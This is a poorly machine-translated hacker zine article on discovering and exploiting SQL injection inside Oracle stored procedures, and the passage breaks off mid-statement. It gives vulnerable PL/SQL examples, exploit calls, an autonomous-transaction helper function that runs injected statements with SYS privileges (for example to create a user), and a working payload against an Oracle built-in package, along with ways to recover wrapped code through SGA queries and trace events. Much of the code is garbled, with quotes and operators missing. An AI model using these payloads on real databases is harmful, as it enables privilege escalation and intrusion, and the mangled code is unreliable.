In-depth mining of SQLINJECTION in ORACLE

= Ph4nt0m Security Team =

Issue 0x02, Phile #0x06 of 0x0A

| = --------------------------------------------------------------------------- = |
| = -------------------- = [Dig into SQLINJECTION in ORACLE] = ----------------- = |
| = --------------------------------------------------------------------------- = |
| = --------------------------------------------------------------------------- = |
| = ----------------------- = [By kj021320] = ---------------------- = |
| = ---------------------- = [<Kj021320_at_126.com>] = --------------------- = |
| = --------------------------------------------------------------------------- = |

I. Preface

I haven't written PAPER for a long time, so I am lazy. I think ORACLE attack and defense technologies in China are rarely studied.
Relatively lacking. Maybe it's my ignorance. Many PAPER abroad have become a classic of ORACLE attack technology.
Next we will discuss the ORACLE internal SQL Injection Technology with you. I believe everyone has read what I wrote.
Art of WEB-SQL-INJECTION 2nd volume ORACLE at the beginning OF 07, this article has been written
Detection Function injection in ORACLE. Unfortunately, many papers go to the grave during an even data loss. Current title
For "dig into SQLINJECTION in ORACLE", why? In fact, ORACLE internal SQL injection is not just an output
Since the function stored procedure, if you think so, it will be too narrow. In fact, there will still be a lot of things
SQL Injection. For example, his TRIGGER, SQLJ, JOB, etc... I hope this article will benefit you from ORACLE attack and defense.
It's your turn to make a brick.

Ii. Text

On the WEB, SQLINJECTION has become the mainstream of the so-called "Daily" website. This is not nonsense, so go to the database
What kind of stored procedures/functions will produce SQLINJECTION? First, let's look at an example:

Example1:

Create or replace procedure kjtest (injcode in varchar2)
AS
BEGIN
Execute immediate begin insert into KJTESTTABLE values (| injcode |); end ;;
END;

Taking a look at the above stored procedures and writing parameters into a table, this often happens during development.

The following call will write string 1 to the kjtesttable table.

Declare
Begin
KJTEST (1 );
End;

Now you can perform POC on injcode.

Declare
Begin
KJTEST (1); dbms_output.put_line (hello );
End;

Execute this method to view the hello output in the console.

OK, the EXP of this attack is very easy to write!

Declare
Begin
KJTEST (1); EXP-CODE; dbms_output.put_line (hello );
End;

In this case, SQL Injection occurs in such a stored procedure. Generally, the stored procedure written by a user has such a vulnerability.
It can only be "Japanese ". However, if the SYSTEM administrator users such as sys system have a large storage problem
. Now let's look at the model of the method call permission in ORA.

As shown in the following figure, a normal user KJ can call sys. dbms_metadata.get_ddl to obtain a system object.
When the function is called, the caller is assigned
Permissions of the same role as sys. Start to operate the query system object, return the result to KJ, and convert it to KJ's own permission again
See the following instructions:

User ---> call a function (convert to the function owner's permission) ---> execute an operation ---> obtain the result ---> (convert to your own permission) ---> end

We can continue to understand the above. If SQL Injection occurs in the SYS user object, then we will
Work as a SYS user, including adding a user. So in the above EXP-CODE, we can use the SYS user
Execute immediate create user kj identified by kj. OK the first example above is
We will discuss it here.

Not all ORA internal SQL injection can be used like this! In the above example
This is often rare. And make good use of it! Let's look at the following example.

Example2:

Create or replace procedure kjtest (injcode in varchar2)
AS
Tbn varchar2 (1000 );
BEGIN
Execute immediate select table_name from user_tables where table_name = | injcode |
Into tbn;
Dbms_output.put_line (tbn );
END;

This method is used for normal calls:

Declare
Begin
KJTEST (KJTESTTABLE );
End;

View the records in your system table named KJTESTTABLE.

OK, now pay attention to the use of dynamic execution of SQL statements in the stored procedure, because the target runs a single SQL statement, then I
We cannot use multiple statements for attacks like Example 1, but we can control the process of executing the current statement. Party
Method is to put a function that establishes EXP. Let this SQL statement be called. See the following usage:

Create or replace function kjhackerexp return integer authid CURRENT_USER IS
Result integer;
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
Execute immediate insert into kjtesttable values (021320 );
COMMIT;
RETURN (RESULT );
End kjhackerexp;

Declare
Begin
KJTEST (KJTESTTABLE | KJHACKEREXP () | );
End;

OK. This is the SQLINJECTION generated in ORACLE. the foreplay is complete! Now go to the mining section.

Mining is divided into two parts: black box and white box.

First, we will introduce the white box mode. The SOURCE of each object in ORACLE will be stored in the database. So
We can use a stored procedure to obtain SYS. DBMS_METADATA.GET_DDL, similar to the following statement:

Select sys. DBMS_METADATA.GET_DDL (FUNCTION, KJHACKEREXP)
FROM DUAL

You can get the Data Declare Source of this object, and you can also query it yourself:

SELECT * from all_source

But is it that simple? Of course not. in ORACLE, encryption methods such as stored procedure functions are also provided,
Similar to SQL Server Stored Procedure encryption. So when you view ctxsys. CTX_DDL, you will find the following:

Create or replace package body ctxsys. CTX_DDL wrapped

Yes, it is the wrap encryption in ORACLE, so it can only be tested in the black box. How to obtain
What are the operations performed by ORACLE? You can use the following methods:

1. traces file of the ORACLE network or server.
2. Analyze ORACLE redo logs.
3. TRIGGER monitoring.
4. query the oracle SQL cache pool (SGA)

Wait, if you have the ability to decompile the ORACLE stored procedure, of course it would be better.

The following describes how to use the simplest SGA query to get back this classic EXP and execute it:

SELECT
SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES (FOO, BAR, DBMS_OUTPUT ". PUT (: P1); SYS. DBMS_OUTPUT.PUT_LINE (KJ021320); END; --, SYS, 0, 1)
FROM DUAL

Run the following command to view the SGA

Select a. ADDRESS, S. HASH_VALUE, S. PIECE, S. SQL _TEXT, U. USERNAME
PARSING_USER_ID, C. USERNAME PARSING_SCHEMA_ID from v $ sqlarea a, V $ SQLTEXT_WITH_NEWLINES
S, DBA_USERS U, DBA_USERS c where a. ADDRESS = S. ADDRESS AND
A. HASH_VALUE = S. HASH_VALUE and a. PARSING_USER_ID = U. USER_ID AND
A. PARSING_SCHEMA_ID = C. USER_ID and exists (select x from v $ SQLTEXT_WITH_NEWLINES
X where x. ADDRESS = A. address and x. HASH_VALUE = A. HASH_VALUE and upper (X. SQL _TEXT) LIKE
% SYS. DBMS_OUTPUT.PUT_LINE (%) order by 1, 2, 3

The following result is displayed:

ADDRESS HASH_VALUE PIECE SQL _TEXT PARSING_USER_ID
PARSING_SCHEMA_ID
668C9120 1612804047 0 BEGIN
"SYS". "DBMS_OUTPUT". PUT (: P1); SYS. DBMS_OUTPUT.PUT_LINE (KJ0 SYS
668C9120 1612804047 1 21320); END; -- ". ODCIIndexUtilCleanup (: p1); END;
SYS

BEGIN
"SYS". "DBMS_OUTPUT". PUT (: P1); SYS. DBMS_OUTPUT.PUT_LINE (KJ021320); END;
-- ". ODCIIndexUtilCleanup (: p1); END;

Because it is an injection point of multiple statements, we can use Example1 as an attack method.

Next we will continue to discuss how to use oracle trace to record data. There are several ways to obtain an SQL
The trace file in the background when the statement is executed. One is SQL _TRACE, and the other is DBMS_SUPPORT or DBMS_SYSTEM.
And directly use the 10046 event. The procedure is as follows:

Alter session set events 10046 trace name context forever, LEVEL 12;
Your SQL STATEMENT...
Alter session set events 10046 trace name context off;

The level has several options:, where 1 is equivalent to the result after setting SQL _TRACE = TRUE, 4 includes
The result of 1 and the actual value of the bound variable. 8 includes the result of 1 and the event waiting. 12 contains the result of 1 at the same time.
So level 12 is the most detailed trace.

OK. I now use a previous vulnerability for testing:

Http://www.milw0rm.com/exploits/3363

Here, the SYS. DBMS_METADATA.GET_DDL SQL injection vulnerability occurs. It depends on how I reproduce it on PLSQL.
His inner foreplay of injection points:

Create or replace function kjhackerexp return integer authid CURRENT_USER IS
Result integer;
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
Execute immediate insert into kj0213109kjtesttable VALUES );
COMMIT;
RETURN (RESULT );
End kjhackerexp;

The following are key statements:

Alter session set events 10046 trace name context forever, LEVEL 12;

Select sys. DBMS_METADATA.GET_DDL (| kj0213109kjhackerexp () |,) from dual;

Alter session set events 10046 TRACE NAME